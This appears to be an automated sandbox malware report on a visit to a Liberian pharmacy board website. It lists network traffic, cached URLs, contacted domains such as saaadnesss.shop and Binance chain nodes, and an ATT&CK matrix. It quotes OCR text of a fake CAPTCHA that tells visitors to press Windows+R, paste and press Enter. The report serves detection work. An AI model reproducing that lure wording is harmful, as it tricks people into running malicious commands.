        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.lpb.gov.lr%2F
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.lpb.gov.lr%2F&format=xml
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-json/wp/v2/pages/2
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/xmlrpc.php?rsd
        Source: chromecache_187.4.drString found in binary or memory: https://www.themepunch.com/links/slider_revolution_wordpress_regular_license
        Source: chromecache_179.4.dr, chromecache_187.4.drString found in binary or memory: https://www.themepunch.com/support-center
        Source: chromecache_205.4.dr, chromecache_207.4.drString found in binary or memory: https://yastatic.net/s3/gdpr/v3/gdpr
        Source: chromecache_205.4.dr, chromecache_207.4.drString found in binary or memory: https://yastatic.net/s3/taxi-front/yango-gdpr-popup/
        Source: chromecache_205.4.dr, chromecache_207.4.drString found in binary or memory: https://ymetrica1.com/watch/3/1
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
        Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
        Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
        Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
        Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
        Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
        Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
        Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
        Source: classification engineClassification label: mal64.phis.win@18/159@51/18
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2020,i,1401660104828824542,16529630401090676831,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.lpb.gov.lr"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2020,i,1401660104828824542,16529630401090676831,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected

        Persistence and Installation Behavior

        barindex
        Source: Chrome DOM: 0.2OCR Text: Complete these Verification Steps TO better prove you are not a robot please: Press hold the Windows Key t: + R, In the verification window. press Ctrl + V, 2. Press Enter on your keyboard to finish, 3. You will observe and agree: "t am a robot, 10; VERIFY finish verification.
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        http://www.lpb.gov.lr0%Avira URL Cloudsafe
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://www.lpb.gov.lr/wp-content/themes/betheme/assets/animations/animations.min.css?ver=27.0.70%Avira URL Cloudsafe
        https://www.lpb.gov.lr/2017/02/03/pharmacy-medicine-store-license-requirements/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0.20%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/visible.min.js?ver=27.0.70%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1-100x75.png0%Avira URL Cloudsafe
        http://www.lpb.gov.lr/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/over-the-counter-medicine/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-json/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.30%Avira URL Cloudsafe
        https://www.lpb.gov.lr/comments/feed/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/themes/betheme/js/scripts.js?ver=27.0.70%Avira URL Cloudsafe
        https://www.lpb.gov.lr/research-drugs-information-center/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/2024/01/logo-1-79x75.png0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/cpd-provider-reg-form/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0.20%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/slick.min.js?ver=27.0.70%Avira URL Cloudsafe
        https://www.lpb.gov.lr/2017/02/03/operating-standared/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0.20%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.130%Avira URL Cloudsafe
        https://lpb.gov.lr/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.6.130%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/so-css/so-css-betheme.css?ver=17074335420%Avira URL Cloudsafe
        https://www.lpb.gov.lr/cpd-course-application-form/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/themes/betheme/js/menu.js?ver=27.0.70%Avira URL Cloudsafe
        https://www.lpb.gov.lr/about/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/contact/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.lpb.gov.lr%2F&format=xml0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/themes/betheme/css/be.css?ver=27.0.70%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-500x375.png0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/board-members/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.10%Avira URL Cloudsafe
        https://www.lpb.gov.lr/events/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e60%Avira URL Cloudsafe
        https://www.lpb.gov.lr0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1-480x360.png0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/2024/01/logo-1-150x150.png0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/gallery/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/themes/betheme/css/responsive.css?ver=27.0.70%Avira URL Cloudsafe
        https://www.lpb.gov.lr/cpd/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/themes/betheme/fonts/fontawesome/fontawesome.css?ver=27.0.70%Avira URL Cloudsafe
        https://www.lpb.gov.lr/2017/02/03/vestibulum-at-pulvinar-nullam/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-100x75.png0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1-1200x900.png0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/2024/02/cover-pages-image-2.png);background-repeat:no-repe0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.min.css?ver=27.0.70%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-json/wp/v2/pages/20%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1.png0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-includes/js/comment-reply.min.js?ver=6.7.10%Avira URL Cloudsafe
        https://www.lpb.gov.lr/xmlrpc.php?rsd0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-480x360.png0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.6.130%Avira URL Cloudsafe
        https://www.lpb.gov.lr/home/feed/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/2017/02/03/mauris-auctor-non-velit-metus/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-includes/js/jquery/ui/core.min.js?ver=1.13.30%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-768x576.png0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-content/themes/betheme/js/parallax/translate3d.js?ver=27.0.70%Avira URL Cloudsafe
        https://www.lpb.gov.lr/staff-profiles/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/registered-professionals/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/rosource-center/0%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-includes/css/dist/block-library/style.min.css?ver=6.7.10%Avira URL Cloudsafe
        https://www.lpb.gov.lr/wp-includes/js/jquery/jquery.min.js?ver=3.7.10%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        jsdelivr.map.fastly.net
        151.101.65.229
        truefalse
          high
          mc.yandex.ru
          93.158.134.119
          truefalse
            high
            lpb.gov.lr
            69.163.179.33
            truefalse
              unknown
              a37dd8b3f3000a75e.awsglobalaccelerator.com
              3.33.155.121
              truefalse
                high
                cdnjs.cloudflare.com
                104.17.25.14
                truefalse
                  high
                  www.google.com
                  142.250.185.68
                  truefalse
                    high
                    stun.l.google.com
                    74.125.250.129
                    truefalse
                      high
                      saaadnesss.shop
                      185.121.235.167
                      truefalse
                        high
                        www.lpb.gov.lr
                        69.163.179.33
                        truefalse
                          unknown
                          s.w.org
                          192.0.77.48
                          truefalse
                            high
                            a1d4ba62fdc34338f.awsglobalaccelerator.com
                            35.71.137.105
                            truefalse
                              high
                              bsc-dataseed.binance.org
                              unknown
                              unknownfalse
                                high
                                cdn.jsdelivr.net
                                unknown
                                unknownfalse
                                  high
                                  data-seed-prebsc-1-s1.bnbchain.org
                                  unknown
                                  unknownfalse
                                    high
                                    mc.yandex.com
                                    unknown
                                    unknownfalse
                                      high
                                      use.fontawesome.com
                                      unknown
                                      unknownfalse
                                        high
                                        _8545._https.data-seed-prebsc-1-s1.bnbchain.org
                                        unknown
                                        unknownfalse
                                          high
                                          NameMaliciousAntivirus DetectionReputation
                                          https://mc.yandex.ru/sync_cookie_image_start_secondary?redirect_domain=mc.yandex.com&token=10611.-yuCCBaYK4CRWSzmL9Jm4JCDqIWwZAny2ROmgX36wKGxzWyajnj8lBQ8tt0qLI52.ww_YVhfLx-sE7lYJHl7m8Ok-Tds%2Cfalse
                                            high
                                            https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/visible.min.js?ver=27.0.7false
                                            • Avira URL Cloud: safe
